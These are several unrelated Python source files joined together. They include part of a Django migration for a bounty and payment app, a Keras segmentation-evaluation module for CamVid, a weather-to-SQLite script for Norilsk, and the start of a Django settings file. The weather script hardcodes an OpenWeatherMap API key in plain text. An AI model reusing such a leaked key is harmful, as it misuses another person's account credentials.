'is_sponsored': ('django.db.models.fields.BooleanField', [], {}),
'key': ('django.db.models.fields.CharField', [], {'max_length': '30', 'null': 'True', 'blank': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Project']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'trackerURL': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'trackerURL_noprotocol': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'updatedDate': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'})
},
u'core.issuecomment': {
'Meta': {'object_name': 'IssueComment'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'content': ('django.db.models.fields.TextField', [], {}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Issue']"})
},
u'core.issuecommenthistevent': {
'Meta': {'object_name': 'IssueCommentHistEvent'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.IssueComment']"}),
'content': ('django.db.models.fields.TextField', [], {}),
'event': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'eventDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'core.offer': {
'Meta': {'object_name': 'Offer'},
'acceptanceCriteria': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'currency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'expirationDate': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Issue']"}),
'lastChangeDate': ('django.db.models.fields.DateTimeField', [], {}),
'no_forking': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '8'}),
'require_release': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'sponsor': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'core.offercomment': {
'Meta': {'object_name': 'OfferComment'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'content': ('django.db.models.fields.TextField', [], {}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'offer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Offer']"})
},
u'core.offercommenthistevent': {
'Meta': {'object_name': 'OfferCommentHistEvent'},
'comment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.OfferComment']"}),
'content': ('django.db.models.fields.TextField', [], {}),
'event': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'eventDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
u'core.payment': {
'Meta': {'object_name': 'Payment'},
'bitcoin_fee': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '16', 'decimal_places': '8'}),
'bitcoin_receive_address': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bitcoin_frespo.ReceiveAddress']", 'null': 'True'}),
'bitcoin_transaction_hash': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True'}),
'confirm_key': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'currency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'fee': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '8'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'lastChangeDate': ('django.db.models.fields.DateTimeField', [], {}),
'offer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Offer']"}),
'offer2payment_suggested_rate': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '16', 'decimal_places': '8'}),
'offer_currency': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'paykey': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'total': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '8'}),
'total_bitcoin_received': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '16', 'decimal_places': '8'}),
'usd2payment_rate': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '16', 'decimal_places': '8'})
},
u'core.paymenthistevent': {
'Meta': {'object_name': 'PaymentHistEvent'},
'event': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'eventDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'payment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Payment']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'core.paymentpart': {
'Meta': {'object_name': 'PaymentPart'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'money_sent': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['bitcoin_frespo.MoneySent']", 'null': 'True'}),
'payment': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Payment']"}),
'paypalEmail': ('django.db.models.fields.EmailField', [], {'max_length': '256', 'null': 'True'}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '16', 'decimal_places': '8'}),
'programmer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'solution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Solution']"})
},
u'core.project': {
'Meta': {'object_name': 'Project'},
'createdByUser': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'homeURL': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image3x1': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'redirectto_project': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Project']", 'null': 'True'}),
'trackerURL': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'core.solution': {
'Meta': {'object_name': 'Solution'},
'accepting_payments': ('django.db.models.fields.BooleanField', [], {}),
'creationDate': ('django.db.models.fields.DateTimeField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Issue']"}),
'lastChangeDate': ('django.db.models.fields.DateTimeField', [], {}),
'programmer': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'status': ('django.db.models.fields.CharField', [], {'max_length': '30'})
},
u'core.tag': {
'Meta': {'object_name': 'Tag'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'objid': ('django.db.models.fields.IntegerField', [], {}),
'objtype': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
u'core.userinfo': {
'Meta': {'object_name': 'UserInfo'},
'about': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'bitcoin_receive_address': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
'brazilianPaypal': ('django.db.models.fields.BooleanField', [], {}),
'hide_from_userlist': ('django.db.models.fields.BooleanField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_paypal_email_verified': ('django.db.models.fields.BooleanField', [], {}),
'is_primary_email_verified': ('django.db.models.fields.BooleanField', [], {}),
'paypalEmail': ('django.db.models.fields.EmailField', [], {'max_length': '256'}),
'paypal_verified': ('django.db.models.fields.BooleanField', [], {}),
'preferred_language_code': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True', 'blank': 'True'}),
'realName': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'receiveAllEmail': ('django.db.models.fields.BooleanField', [], {}),
'receiveEmail_announcements': ('django.db.models.fields.BooleanField', [], {}),
'receiveEmail_issue_comments': ('django.db.models.fields.BooleanField', [], {}),
'receiveEmail_issue_offer': ('django.db.models.fields.BooleanField', [], {}),
'receiveEmail_issue_payment': ('django.db.models.fields.BooleanField', [], {}),
'receiveEmail_issue_work': ('django.db.models.fields.BooleanField', [], {}),
'screenName': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'website': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'})
},
u'core.watch': {
'Meta': {'object_name': 'Watch'},
'entity': ('django.db.models.fields.CharField', [], {'max_length': '60'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'issue': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['core.Issue']", 'null': 'True'}),
'objid': ('django.db.models.fields.IntegerField', [], {}),
'reason': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
}
}
complete_apps = ['core']
|
import matplotlib.pyplot as plt
import numpy as np
import cv2
import IPython
import pandas as pd
import os
import glob
import matplotlib.patches as mpatches
import keras.backend as K
import time
from matplotlib import colors
import json
import tensorflow as tf
from DataGenerators import onehot_to_mask, mask_to_onehot, load_img, img_to_array
from DataGenerators import CAMVIDImageDataGenerator
from sklearn.metrics import confusion_matrix, jaccard_similarity_score
from LabelNames import LabelNames
import matplotlib.patches as mpatches
from skimage.measure import regionprops, label
from skimage.color import label2rgb
from PIL import Image as pil_image
def conf_matrix(preds, labels, normalized=False):
'''Calculate the confusion matrix and jaccard sim (iou)
for one-hot encoded binary mask
predictions.
Arguments:
preds: a numpy array of size (batch_size, height, width, classes)
labels: a numpy array of size (batch_size, height, width, classes)
Returns:
A confusion matrix with size classes x classes both normalized and
unnormalized
'''
preds = preds.astype(int)
labels = labels.astype(int)
assert len(labels.shape) in (3, 4) or len(preds.shape) in (3, 4)
b, h, w, c = np.shape(labels)
# Observations that fits with confusion_matrix
pr = preds
la = np.argmax(labels, axis=3)
x = np.reshape(pr, (b, h*w))
y = np.reshape(la, (b, h*w))
conf_mat = np.zeros((c, c), dtype=int)
# Create confusion matrix for each image in batch
for batch in range(b):
cx = x[batch] # current batch
cy = y[batch] # current batch
conf_mat += confusion_matrix(cx,
cy,
labels=np.arange(c))
conf_mat_return = conf_mat
if normalized:
sums = np.sum(conf_mat, axis=0)
conf_mat_norm = conf_mat.astype(np.float32) / sums[np.newaxis, :]
conf_mat_return = conf_mat_norm
return conf_mat_return
def safe_divide(a, b):
"""
Avoid divide by zero
http://stackoverflow.com/questions/26248654/numpy-return-0-with-divide-by-zero
"""
with np.errstate(divide='ignore', invalid='ignore'):
c = np.true_divide(a, b)
c[c == np.inf] = 0
c = np.nan_to_num(c)
return c
class EvaluateModel():
'''Easening the process of evaluating a model, e.g. tex overview table
of timings, performance, CV folds, visualisation of predictions etc.'''
def __init__(self, model, experiment):
self.model = model
self.experiment = experiment
self.predictions = None
self.images = None
self.labels = None
self.static_predictions_plot = None
self.total_n = None
self.timings_tf = []
self.timings_K = []
self.static_images_idx = [0, 10, 20]
self.no_parameters = self.get_no_parameters()
self.no_images_used_for_timings = 0
self.normalization = self.experiment.datagen_args["featurewise_center"] and self.experiment.datagen_args["featurewise_std_normalization"]
self._get_label_names()
self.generate_report_output()
def _save_json(self):
dump = {"label_names": self.label_names,
"confusion_mat": self.confusion_mat.tolist(),
"support": self.support.tolist(),
"precision": self.precision.tolist(),
"recall": self.recall.tolist(),
"f1": self.f1.tolist(),
"avg_accuracy": self.avg_accuracy,
"timings_tf": self.timings_tf.tolist(),
"timings_K": self.timings_K.tolist()
}
path = os.path.dirname(self.experiment.experiment_name)
with open(path + "/scores.json", "w") as fp:
json.dump(dump, fp)
def _get_label_names(self):
ln = LabelNames()
if self.experiment.eval_data == "camvid":
self.label_names = ln.camvid_void.keys()
elif self.experiment.eval_data == "vrinno":
self.label_names = ln.vrinno.keys()
def plot_training(self):
val_avg = "val_avg_IOU_12" if self.experiment.eval_data == "camvid" else "val_avg_IOU_4"
# Build data from tensorboard log
path = os.path.join(os.path.dirname(self.experiment.experiment_name), "decoder")
loss, mIOU, acc= [], [], []
epochs = 1
path_log_file = glob.glob(path + "/*events*")
if len(path_log_file) == 1:
for e in tf.train.summary_iterator(path_log_file[0]):
for v in e.summary.value:
if v.tag == 'loss':
loss.append(v.simple_value)
if v.tag == val_avg:
mIOU.append(v.simple_value)
if v.tag == "val_acc":
acc.append(v.simple_value)
# Create dataframe
loss = np.array(loss)
loss = (loss-min(loss))/(max(loss)-min(loss))
df = pd.DataFrame(np.array([loss, mIOU, acc]).T, columns=["Test loss","Validation mIoU","Validation accuracy"])
out_plot = df.plot()
max_v, indx = np.max(mIOU), np.argmax(mIOU)
plt.plot(indx, max_v, 'or')
out_plot.figure.savefig(os.path.join(path, "train_process_decoder.png"))
# If we train encoder-decoder style there should be something in /encoder log as well
path = os.path.join(os.path.dirname(self.experiment.experiment_name), "encoder")
loss, mIOU, acc= [], [], []
epochs = 1
path_log_file = glob.glob(path + "/*events*")
if len(path_log_file) == 1:
for e in tf.train.summary_iterator(path_log_file[0]):
for v in e.summary.value:
if v.tag == 'loss':
loss.append(v.simple_value)
if v.tag == val_avg:
mIOU.append(v.simple_value)
if v.tag == "val_acc":
acc.append(v.simple_value)
# Create dataframe
loss = np.array(loss)
loss = (loss-min(loss))/(max(loss)-min(loss))
df = pd.DataFrame(np.array([loss, mIOU, acc]).T, columns=["Test loss","Validation mIoU","Validation accuracy"])
out_plot = df.plot()
max_v, indx = np.max(mIOU), np.argmax(mIOU)
plt.plot(indx, max_v, 'or')
out_plot.figure.savefig(os.path.join(path, "train_process_encoder.png"))
def compute_timings(self):
print("Estimating frames per second...")
sess = K.get_session()
input_tensor = self.model.input
output_tensor = self.model.output
self.no_images_used_for_timings = self.images.shape[0]
img = self.images
for b in img:
x = np.expand_dims(b, 0)
# Time using native TensorFlow
start_time_tf = time.time()
output_tensor.eval(feed_dict={input_tensor: x}, session=sess)
time_tf = time.time()-start_time_tf
self.timings_tf.append(time_tf)
# Time using Keras
start_time_K = time.time()
self.model.predict(x)
time_K = time.time()-start_time_K
self.timings_K.append(time_K)
def generate_report_output(self):
path = os.path.dirname(self.experiment.experiment_name)
self.get_predictions()
self.get_images_and_labels() # Must be called after get_predictions()
self.visualise_predictions_static()
self.prepare_tables()
self.get_no_parameters()
self.compute_timings()
self.plot_training()
def get_no_parameters(self):
return self.model.count_params()
def prepare_tables(self):
pd.set_option('precision', 2)
print("Computing confusion matrix...")
confmatrix = conf_matrix(self.predictions,
self.labels)
self.compute_scores(confmatrix)
# Write confusion matrix to .tex table
confmat_pd = pd.DataFrame(self.confusion_mat,
columns=self.label_names,
index=self.label_names)
self.write_table(confmat_pd, "confmat.tex", index=True)
# Write 1-D score arrays to .tex tables
lst = ["support.tex", "precision.tex",
"recall.tex", "f1.tex", "IOU.tex"]
lst_att = [self.support, self.precision,
self.recall, self.f1, self.IOU]
for score, name in zip(lst_att, lst):
tmp_pd = pd.DataFrame(score)
tmp_pd = tmp_pd.T
tmp_pd.columns = self.label_names
self.write_table(tmp_pd, name, index=False)
def get_images_and_labels(self):
datagen = self.get_generator(self.total_n)
self.images, self.labels = datagen.next()
self.images = self.images.astype(np.uint8)
def get_predictions(self, batch_size=5):
# Predict in batches, as we cannot handle too much in memory
datagen = self.get_generator(batch_size)
preds = np.zeros((datagen.n,) + self.experiment.target_shape)
no_batches = int(np.ceil(datagen.n / float(batch_size)))
current_index = 0
for batch in range(no_batches):
x, y = datagen.next()
current_batch_size = x.shape[0]
print("Predicting batch {0} of {1} with size {2}".format(batch + 1,
no_batches,
current_batch_size))
if self.normalization:
x = self.normalize(x)
preds[current_index:(current_index+current_batch_size)] = self.model.predict(x)
current_index += current_batch_size
self.total_n = preds.shape[0]
self.predictions = onehot_to_mask(preds)
self.heat_img = preds[self.static_images_idx]
def compute_scores(self, confusion_mat):
"""Compute scores from a confusion matrix.
# Arguments
confusion_mat: a 2D array of size [nb_labels, nb_labels]
containing a confusion matrix
"""
# Remove void class for computing the scores
self.confusion_mat = confusion_mat
print("Computing evaluation metrics...")
true_pos = np.diagonal(confusion_mat)
false_pos = np.sum(confusion_mat, axis=0) - true_pos
false_neg = np.sum(confusion_mat, axis=1) - true_pos
self.support = np.sum(confusion_mat, axis=1)
self.precision = safe_divide(true_pos, (true_pos + false_pos))
self.recall = safe_divide(true_pos, (true_pos + false_neg))
self.f1 = 2 * safe_divide((self.precision * self.recall),
(self.precision + self.recall))
self.IOU = safe_divide(true_pos, (true_pos+false_pos+false_neg))
void_idx = self.label_names.index("void")
self.avg_IOU = np.mean(self.IOU)
self.avg_accuracy = np.sum(true_pos) / float(np.sum(self.support))
def visualise_predictions_static(self, show=False):
print("Saving evaluation prediction and ground truth...")
image_index = np.random.randint(self.total_n)
pred = self.predictions[image_index]
x = self.images[image_index]
y = onehot_to_mask(self.labels[image_index])
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes)
norm = colors.BoundaryNorm(bounds, cmap.N)
fig = plt.figure(1)
ax = plt.subplot(311)
ax.imshow(np.squeeze(x))
ax.axis('off')
ax = plt.subplot(312)
ax.imshow(y, cmap=cmap, norm=norm)
ax.axis('off')
ax = plt.subplot(313)
ax.imshow(pred, cmap=cmap, norm=norm)
ax.axis('off')
plt.tight_layout(h_pad=0.01)
self.make_legend(label_colors,
self.label_names)
self.static_predictions_plot = fig
if show:
plt.show()
def predict_and_save_from_path(self, path, alpha=0.72):
allfiles = [f for f in os.listdir(path) if os.path.isfile(os.path.join(path, f))]
images = [img for img in allfiles if img.endswith(".jpeg")]
images = sorted(images)
print("Found {} images...".format(len(images)))
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes + 1)
norm = colors.BoundaryNorm(bounds, cmap.N)
ctr = 1
for img_file in images:
print("Saving {0} of {1} predictions...".format(ctr, len(images)))
ctr += 1
img_path = os.path.join(path, img_file)
x = load_img(img_path, target_size=(360, 480))
x = img_to_array(x)
x_norm = x.astype(np.float32)
x_norm = np.expand_dims(x_norm, 0)
x_norm = self.normalize(x_norm)
pred = self.model.predict(x_norm)
pred = onehot_to_mask(pred)
plt.clf()
plt.imshow(np.squeeze(x))
plt.imshow(np.squeeze(pred), cmap=cmap, norm=norm, alpha=alpha)
# plt.annotate(tim_show, xy=(mid, bottom), xytext=(mid, bottom))
plt.axis('off')
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig(os.path.join(os.path.join(path, "preds"), img_file), bbox_inches='tight', pad_inches=0)
plt.clf()
def get_bbox(self, region_area=50):
img = self.images[0]
pred = self.predictions[0]
label_image = label(pred)
image_label_overlay = label2rgb(label_image,
bg_label=0,
image=img)
fig, ax = plt.subplots(figsize=(10, 6))
ax.imshow(image_label_overlay)
for region in regionprops(label_image):
if region.area >= region_area:
minr, minc, maxr, maxc = region.bbox
rect = mpatches.Rectangle((minc, minr), maxc - minc, maxr - minr,
fill=False, edgecolor='red', linewidth=2)
ax.add_patch(rect)
ax.set_axis_off()
plt.tight_layout()
plt.show(block=False)
def save_predictions(self, alpha=0.72, no_images=None):
'''Save the predictions as a overlay on the inputs'''
# Define paths
path = os.path.dirname(self.experiment.experiment_name)
path = os.path.join(path, "preds")
# Get data
x_batch, y_batch = self.images, self.labels
# Standard save all images
if not no_images:
no_images = x_batch.shape[0]
# Define plotting specs
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes + 1)
norm = colors.BoundaryNorm(bounds, cmap.N)
# Get the computed timings to show in the images
timings = np.round(np.divide(1, self.timings_tf), 1)
# Timings should have same sise as x_batch.shape[0]
assert x_batch.shape[0] == len(timings)
# Get shapes for annotating text
mid = x_batch.shape[2]/2-30
bottom = 10
# Begin looping
for i in range(no_images):
print("Saving image {0} of {1}...".format(i+1, no_images))
y = onehot_to_mask(y_batch[i])
x = x_batch[i]
pred = self.predictions[i]
imname = os.path.join(path, str(i) + ".png")
tim = timings[i]
tim_show = "FPS: " + str(tim)
plt.figure()
plt.imshow(x)
plt.imshow(pred, cmap=cmap, norm=norm, alpha=alpha)
plt.annotate(tim_show, xy=(mid, bottom), xytext=(mid, bottom))
plt.axis('off')
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig(imname, bbox_inches='tight', pad_inches=0)
plt.clf()
def save_predictions_as_mask(self):
path = os.path.dirname(self.experiment.experiment_name)
path = os.path.join(path, "preds")
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes + 1)
norm = colors.BoundaryNorm(bounds, cmap.N)
for i, img in enumerate(self.predictions):
imname = os.path.join(path, str(i) + ".png")
plt.figure()
plt.imshow(img, cmap=cmap, norm=norm)
plt.axis('off')
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig(imname, bbox_inches='tight', pad_inches=0)
plt.clf()
plt.close('all')
def save_ground_truth_as_mask(self):
path = os.path.dirname(self.experiment.experiment_name)
path = os.path.join(path, "preds")
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes + 1)
norm = colors.BoundaryNorm(bounds, cmap.N)
for i, img in enumerate(self.labels):
imname = os.path.join(path, str(i) + "_mask.png")
img = onehot_to_mask(img)
plt.figure()
plt.imshow(img, cmap=cmap, norm=norm)
plt.axis('off')
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.savefig(imname, bbox_inches='tight', pad_inches=0)
plt.clf()
plt.close('all')
plt.cla()
def visualise_predictions_video(self, on_click=True):
x_batch, y_batch = self.images, self.labels
no_images = x_batch.shape[0]
label_colors = self._get_label_colors() / float(255)
cmap = colors.ListedColormap(label_colors)
bounds = np.arange(self.experiment.nb_classes + 1)
norm = colors.BoundaryNorm(bounds, cmap.N)
for i in range(no_images):
y = onehot_to_mask(y_batch[i])
x = x_batch[i]
pred = self.predictions[i]
fig = plt.figure(1)
ax = plt.subplot(311)
ax.set_title("Original image")
ax.imshow(x)
ax.axis('off')
ax = plt.subplot(312)
ax.set_title("Ground truth")
ax.imshow(y, cmap=cmap, norm=norm)
ax.axis('off')
ax = plt.subplot(313)
ax.set_title("ENet predictions")
ax.imshow(pred, cmap=cmap, norm=norm)
ax.axis('off')
main_title = "Image {0} of {1} in dataset {2} split {3}".format(i,
no_images,
self.experiment.eval_data,
self.experiment.eval_type)
plt.suptitle(main_title)
self.make_legend(label_colors,
self.label_names)
if on_click:
plt.waitforbuttonpress()
plt.draw()
else:
plt.pause(2)
plt.draw()
def visualise_heatmaps(self, class_idx=2):
preds = self.heat_img
imgs = self.images[self.static_images_idx]
lbl = onehot_to_mask(self.labels[self.static_images_idx])
fig = plt.figure(1)
ax = plt.subplot(311)
ax.set_title("Original image")
ax.imshow(imgs[0])
ax.axis('off')
ax = plt.subplot(312)
ax.set_title("Heatmap rails")
ax.imshow(preds[0, :, :, class_idx])
ax.axis('off')
ax = plt.subplot(313)
ax.set_title("Ground truth")
ax.imshow(lbl[0])
ax.axis('off')
plt.show(block=False)
def write_table(self, pd, name, index):
path = os.path.dirname(self.experiment.experiment_name)
with open(path + "/tables/" + name, "w") as text_file:
text_file.write(pd.to_latex(index=index))
def _get_label_colors(self):
if self.experiment.dataset == "camvid":
Sky = [44, 44, 44]
Building = [128, 0, 0]
Pole = [192, 192, 128]
Road = [128, 64, 128]
Pavement = [60, 40, 222]
Tree = [128, 128, 0]
SignSymbol = [192, 128, 128]
Fence = [64, 64, 128]
Car = [64, 0, 128]
Pedestrian = [64, 64, 0]
Bicyclist = [0, 128, 192]
Unlabelled = [0, 0, 0]
label_colours = np.array([Sky, Building, Pole, Road, Pavement,
Tree, SignSymbol, Fence, Car, Pedestrian,
Bicyclist, Unlabelled])
elif self.experiment.dataset == "vrinno":
Unlabelled = [0, 0, 0]
Pedestrian = [64, 64, 0]
Car = [64, 0, 128]
Rail = [255, 0, 0]
label_colours = np.array([Unlabelled, Pedestrian, Car, Rail])
return label_colours
def normalize(self, x):
mean = np.load("tmp/" + self.experiment.eval_data + "_train_mean.npy")
std = np.load("tmp/" + self.experiment.eval_data + "_train_std.npy")
broadcast_shape = [1, 1, 1]
broadcast_shape[3 - 1] = x.shape[3]
mean = np.reshape(mean, broadcast_shape)
x -= mean
broadcast_shape = [1, 1, 1]
broadcast_shape[3 - 1] = x.shape[3]
std = np.reshape(std, broadcast_shape)
x /= (std + K.epsilon())
return x
@staticmethod
def make_legend(colors, label_names):
patches = []
for col, label_name in zip(colors, label_names):
patch = mpatches.Patch(
edgecolor='black',
linewidth=0.5,
label=label_name,
facecolor=col)
patches.append(patch)
plt.legend(handles=patches,
loc='center right',
fontsize=8,
bbox_to_anchor=(0, -0.1, 1, 1),
bbox_transform=plt.gcf().transFigure)
def get_generator(self, batch_size):
gen = CAMVIDImageDataGenerator(data_split=self.experiment.eval_type,
val_mode=True)
dat = gen.flow_from_directory("data/" + self.experiment.eval_data,
dataset=self.experiment.eval_data,
batch_size=batch_size,
target_size_mask=(360, 480),
keep_classes=self.experiment.keep_classes)
return dat
class EvaluateGenerator():
def __init__(self, gen):
self.nb_batches = 0
self.generator = gen
def visualise(self, no_images=5):
for i in range(no_images):
current_batch = self.generator.next()
im = current_batch[0][i]
msk = onehot_to_mask(current_batch[1][i])
plt.figure(1)
plt.subplot(121)
plt.imshow(im)
plt.title("Image")
plt.subplot(122)
plt.imshow(msk)
plt.show(block=False)
plt.title("Mask")
plt.waitforbuttonpress()
if __name__ == "__main__":
import DataGenerators
gen = DataGenerators.CAMVIDImageDataGenerator()
cm = gen.flow_from_directory("data/camvid/")
ee = EvaluateGenerator(cm)
ee.visualise()
|
import sqlite3
from datetime import datetime
import os.path
import pyowm
from .collect_weather import get_weather_humidity
from .collect_weather import get_weather_temperature
from .collect_weather import get_weather_wind_direction
from .collect_weather import get_weather_wind_speed
from .collect_weather import GetWeather
# openweathermap API key
# please use you own api key!
owm = pyowm.OWM('3ede2418f1124401efcd68e5ae3bddcb')
# Town
town = "Norilsk"
area = 'ru'
norilsk = GetWeather(town, area, '3ede2418f1124401efcd68e5ae3bddcb')
print(norilsk.wind_direction())
# print(GetWeather(town, '3ede2418f1124401efcd68e5ae3bddcb').wind_direction())
observation = owm.weather_at_place('{0},ru'.format(town))
w = observation.get_weather()
def local_time():
# Текущее время и дата
time = datetime.now().replace(microsecond=0)
return time
#############################################################################
# Test data
db_file_name = "weather.db"
date_time = local_time()
temperature = get_weather_temperature()
humidity = get_weather_humidity()
wind = "{0} м/с".format(get_weather_wind_speed())
wind_direction = get_weather_wind_direction()
#############################################################################
def create_db(db_file_name_local):
# База с погодными данными
db_connection = sqlite3.connect(db_file_name_local)
db_conn_cursor = db_connection.cursor()
db_conn_cursor.execute('''CREATE TABLE weather
(id INTEGER PRIMARY KEY, town TEXT, dtime TEXT, t_value TEXT, h_value INTEGER, w_value TEXT, w_dir TEXT)''')
db_connection.commit()
db_connection.close()
print("File created")
def open_and_write_db(db_file_name_local):
# База с погодными данными
db_connection = sqlite3.connect(db_file_name_local)
db_conn_cursor = db_connection.cursor()
db_conn_cursor.execute('''INSERT INTO weather(town, dtime, t_value, h_value, w_value, w_dir)
VALUES(?,?,?,?,?,?)''', (town, date_time, temperature, humidity, wind, wind_direction))
# Save (commit) the changes
db_connection.commit()
for row in db_conn_cursor.execute('SELECT * FROM weather ORDER BY id'):
print(row)
# We can also close the connection if we are done with it.
# Just be sure any changes have been committed or they will be lost.
db_connection.close()
if not (os.path.isfile(db_file_name)):
create_db(db_file_name)
open_and_write_db(db_file_name)
|
"""
Django settings for imagersite project.
Generated by 'django-admin startproject' using Django 1.10.5.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
